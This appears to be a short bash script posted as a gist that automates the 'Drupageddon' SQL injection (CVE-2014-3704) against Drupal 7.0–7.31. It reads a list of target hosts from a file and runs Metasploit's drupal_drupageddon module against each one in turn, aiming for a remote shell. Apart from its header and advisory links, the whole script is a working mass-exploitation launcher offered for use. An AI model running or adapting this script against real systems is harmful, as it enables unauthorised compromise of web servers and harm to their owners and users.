MINI-EXPLOIT // Drupal HTTP Parameter Key/Value SQL Injection
#!/bin/bash | |
: ' | |
MINI-EXPLOIT // Metasploit->Drupal HTTP Parameter Key/Value SQL Injection | |
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection | |
(aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. | |
This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). | |
Exploração: Drupal 7.0 - 7.31 | |
----------------------------------------------------------------------- | |
AUTOR-SCRIPT-OTIMIZADOR: | |
Cleiton Pinheiro / Nick: googleINURL | |
[+] EMAIL: inurlbr@gmail.com | |
[+] Blog: http://blog.inurl.com.br | |
[+] Twitter: https://twitter.com/googleinurl | |
[+] Fanpage: https://fb.com/InurlBrasil | |
[+] Pastebin http://pastebin.com/u/Googleinurl | |
[+] GIT: https://github.com/googleinurl | |
[+] PSS: http://packetstormsecurity.com/user/googleinurl | |
[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro | |
[+] YOUTUBE: http://youtube.com/c/INURLBrasil | |
[+] PLUS: http://google.com/+INURLBrasil | |
----------------------------------------------------------------------- | |
Use: | |
./Drupal7.0-7.31.sh hosts.txt | |
' | |
# CVE-2014-3704 | |
# SOURCE MODULE: | |
# http://www.rapid7.com/db/modules/exploit/multi/http/drupal_drupageddon | |
# URL: https://www.drupal.org/SA-CORE-2014-005 | |
# URL: http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html | |
echo "[+] MINI-EXPLOIT / Metasploit->(Drupal HTTP Parameter Key/Value SQL Injection) - INURL BRASIL" | |
filename=$1 | |
filelines=`cat $filename` | |
exploit='exploit/multi/http/drupal_drupageddon' | |
echo "[+] [ START PROCESS ]" | |
echo "[+] [EXPLOIT] $exploit" | |
for line in $filelines ; do | |
echo "----------------------------------------------------------------------------------" | |
echo "==================================================================================" | |
echo "----------------------------------------------------------------------------------" | |
echo "[+] [ TARGET ] " $line | |
echo "[!] [ exec ] metasploit..." | |
msfconsole -x "use $exploit;set RHOST $line;exploit;exit;" | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment